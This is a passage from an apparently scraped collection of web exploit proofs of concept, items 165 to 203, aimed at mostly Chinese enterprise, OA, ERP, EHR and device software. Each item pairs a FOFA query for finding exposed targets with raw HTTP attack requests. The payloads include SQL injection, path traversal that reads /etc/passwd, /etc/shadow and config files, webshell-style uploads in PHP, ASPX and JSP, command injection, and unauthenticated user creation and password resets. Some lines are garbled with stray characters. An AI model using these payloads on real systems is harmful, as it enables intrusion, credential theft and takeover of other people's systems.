Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. Lean value management system (精益价值管理系统) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

: g4 }/ \, o8 V  o& b169. 宏景EHR downlawbase SQL注入
$ ^) i$ M4 ]5 b* `1 l. V: Q" JFOFA:app="HJSOFT-HCM"
" E7 A! i+ h  Z8 @9 Y; lGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
# Q8 G- O' ?: s6 b* p+ BHost: your-ip0 H2 F8 ~/ V* ~: n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
5 D: _8 I9 {, v0 o/ b; fAccept: */*& K3 f; Z# Y6 d0 v% r2 \/ ?0 K+ E
Accept-Encoding: gzip, deflate
$ W0 _; c) N/ PConnection: close
3 A" J1 [& g. \( `) p
& m! m: S5 D6 P' t7 t- y+ {" v3 ?1 V* E7 X
) X- s, x" Y. W1 J0 D
170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 (REALOR) application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450)

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 (short video matrix marketing system) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科 云鉴 security management system setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain
<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"
{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet access behavior management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入+ A& y1 }7 A" O6 \' e: I) n( J( B5 O
FOFA:app="浙大恩特客户资源管理系统"0 M2 E9 N; }2 [
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1$ K  [6 Y* P/ ^2 h# g  @
Host:# q9 l3 r5 |) P# G4 Q; I1 w9 H: n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
6 O, I4 @6 S8 l" N$ k6 xAccept-Encoding: gzip, deflate
2 X' |. ]$ w& XConnection: close' f1 E- K4 O9 L* h

+ k" o! ~9 i' }/ L: ]( V7 G) B$ ?$ @$ ]8 q- u
- w& S7 U$ u  R9 r7 ?. i4 G9 |1 E
198. 阿里云盘 WebDAV (aliyundrive-webdav) command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager_upload interface file upload

1. Run the PoC to fetch the CSRF value, obtain a cookie with it, then upload and request the file to get the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云 EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--